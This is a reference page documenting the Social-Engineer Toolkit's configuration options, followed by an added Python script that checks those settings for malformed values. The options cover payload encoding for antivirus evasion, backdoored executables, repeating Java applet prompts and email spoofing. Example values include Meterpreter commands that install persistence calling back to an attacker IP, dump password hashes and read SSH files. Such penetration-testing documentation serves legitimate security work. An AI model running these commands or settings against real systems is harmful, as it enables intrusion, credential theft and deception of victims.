Social-Engineer-Toolkit-SET/Configuration

From aldeid

Location

The configuration file is available in /pentest/exploits/set/config. It is named set_config.

Parameters

METASPLOIT_PATH=/opt/metasploit/msf3
Defines the path to Metasploit.
METASPLOIT_DATABASE=postgresql
Specifies which database to use with the Metasploit framework. The default value is postgresql.
ENCOUNT=4
How many times SET should encode a payload if you're using standard Metasploit encoding options.
AUTO_MIGRATE=OFF
If this option is set, the Metasploit payloads will automatically migrate to notepad once the applet is executed.
It can be useful if the victim closes the browser. However, it can introduce buggy results.
CUSTOM_EXE=legit.binary
Custom EXE you want to use for Metasploit encoding. This usually has better Antivirus detection.
Currently set to legit.binary which is just calc.exe, as an example.
BACKDOOR_EXECUTION=ON
Used with the backdoored executable if you want the executable to keep working.
Normally, when legit.binary is used, it will render the application useless. Specifying this will keep the application working.
METERPRETER_MULTI_SCRIPT=OFF
LINUX_METERPRETER_MULTI_SCRIPT=OFF
Run multiple Meterpreter scripts once a session is active.
This may be important if we are sleeping and need to run persistence.
Tries to elevate permissions and other tasks in an automated fashion.
First turn this trigger on, then configure the flags.
Note that you need to separate the commands with a semicolon.
METERPRETER_MULTI_COMMANDS=run persistence -r 192.168.1.5 -p 21 -i 300 -X -A;getsystem
LINUX_METERPRETER_MULTI_COMMANDS=uname;id;cat ~/.ssh/known_hosts
Commands you want to run once a Meterpreter session has been established.
Note that you need to separate commands with a semicolon. Example: run getsystem;run hashdump;run persistence
METASPLOIT_IFRAME_PORT=8080
Port used for the IFRAME injection using the Metasploit browser attacks.
By default, this port is 8080. If egress filtering is blocking it, you may replace with 21 or 53.
ETTERCAP=OFF
Use Ettercap with the website attack.
ETTERCAP_PATH=/usr/share/ettercap
Ettercap home directory (needed for DNS_SPOOF)
ETTERCAP_DSNIFF_INTERFACE=eth0
Specify what interface you want Ettercap or Dsniff to listen to.
DSNIFF=OFF
Whether to use Dsniff with the website attack. If Dsniff is set to ON, Ettercap will automatically be disabled.
AUTO_DETECT=ON
Auto detection of IP address interface using Google. Set this to ON only if you want SET to auto detect your interface.
SENDMAIL=OFF
Turn sendmail ON or OFF for spoofing email addresses.
EMAIL_PROVIDER=GMAIL
Email provider list supports GMAIL, HOTMAIL and YAHOO.
WEBATTACK_EMAIL=OFF
Set to ON if you want to use email in conjunction with Web Attack.
MLITM_PORT=80
Man Left In The Middle port. This will be used for the web server bind port
APACHE_SERVER=OFF
Use Apache instead of standard python web servers. This will increase the speed of the attack vector.
APACHE_DIRECTORY=/var/www
Path to the Apache webroot.
WEB_PORT=80
Specify what port to run the HTTP server on. Used for the Java applet attack or Metasploit exploit.
Default port is 80
SELF_SIGNED_APPLET=OFF
Create self-signed Java applets and spoof publisher.
Note that you have to install Java 6 JDK (apt-get install openjdk-6-jdk or apt-get install sun-java6-jdk)
JAVA_ID_PARAM=Secure Java Applet
This flag will set the Java ID flag within the Java applet to something different.
This could be used to make it more believable or for better obfuscation.
JAVA_REPEATER=ON
Java applet repeater option will continue to prompt the user with the Java applet if the user hits "Cancel".
This means it will be continuous until run is executed, which gives a better success rate for the Java Applet Attack.
JAVA_TIME=200
Delay for the Java repeater (in hundredths of a second) between the user hitting "Cancel" and the next Java applet run.
200 means 2 seconds.
WEBATTACK_SSL=OFF
Turn ON SSL certificates to secure communications through Web Attack vector.
SELF_SIGNED_CERT=OFF
Set to ON to self-sign certificates with the Web Attack vector. Ensure OpenSSL is installed.
PEM_CLIENT=/root/newcert.pem
PEM_SERVER=/root/newreq.pem
Client/Server private cert in PEM format
WEBJACKING_TIME=2000
Tweak the Web Jacking time (expressed in milliseconds) used for the IFRAME replace.
5000 means 5 seconds
COMMAND_CENTER_INTERFACE=127.0.0.1
Command Center interface to bind to. To enable it on all interfaces, set it to 0.0.0.0.
COMMAND_CENTER_PORT=44444
Port for the Command Center
SET_INTERACTIVE_SHELL=ON
Include (ON) or Remove (OFF) the interactive shell from the menu selection.
TERMINAL=SOLO
Default terminal within the Command Center.
Default is XTERM. Can be XTERM, KONSOLE, GNOME or SOLO.
SOLO will place all results in the same shell you used to open the SET-Web interface.
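
A checker for the settings documented above, as an added example (not part of SET or of the original page). It parses the KEY=VALUE format and reports malformed ON/OFF switches, out-of-range ports, a Command Center bound to all interfaces, and the DSNIFF/ETTERCAP override. The function names, the handling of `#` comment lines and the sample input are assumptions made for this example.

```python
ON_OFF_KEYS = {
    "AUTO_MIGRATE", "BACKDOOR_EXECUTION", "METERPRETER_MULTI_SCRIPT",
    "LINUX_METERPRETER_MULTI_SCRIPT", "ETTERCAP", "DSNIFF", "AUTO_DETECT",
    "SENDMAIL", "WEBATTACK_EMAIL", "APACHE_SERVER", "SELF_SIGNED_APPLET",
    "JAVA_REPEATER", "WEBATTACK_SSL", "SELF_SIGNED_CERT", "SET_INTERACTIVE_SHELL",
}
PORT_KEYS = {"METASPLOIT_IFRAME_PORT", "MLITM_PORT", "WEB_PORT", "COMMAND_CENTER_PORT"}

def parse_set_config(text):
    """Return {KEY: value}; skipping blank and '#' lines is an assumption."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)  # split once: values may contain '='
        settings[key.strip()] = value.strip()
    return settings

def audit(settings):
    """Return a list of findings; an empty list means nothing was flagged."""
    findings = []
    for key in sorted(ON_OFF_KEYS.intersection(settings)):
        if settings[key] not in ("ON", "OFF"):
            findings.append(f"{key}: expected ON or OFF, got {settings[key]!r}")
    for key in sorted(PORT_KEYS.intersection(settings)):
        value = settings[key]
        if not value.isdecimal() or not 1 <= int(value) <= 65535:
            findings.append(f"{key}: not a valid TCP port: {value!r}")
    if settings.get("COMMAND_CENTER_INTERFACE") == "0.0.0.0":
        findings.append("COMMAND_CENTER_INTERFACE: Command Center listens on all interfaces")
    if settings.get("DSNIFF") == "ON" and settings.get("ETTERCAP") == "ON":
        findings.append("ETTERCAP: ignored because DSNIFF=ON disables it")
    return findings

SAMPLE = """\
# constructed sample, not a real set_config
WEB_PORT=80
COMMAND_CENTER_INTERFACE=0.0.0.0
COMMAND_CENTER_PORT=444444
ETTERCAP=ON
DSNIFF=ON
AUTO_DETECT=on
"""

if __name__ == "__main__":
    print("\n".join(audit(parse_set_config(SAMPLE))))
```
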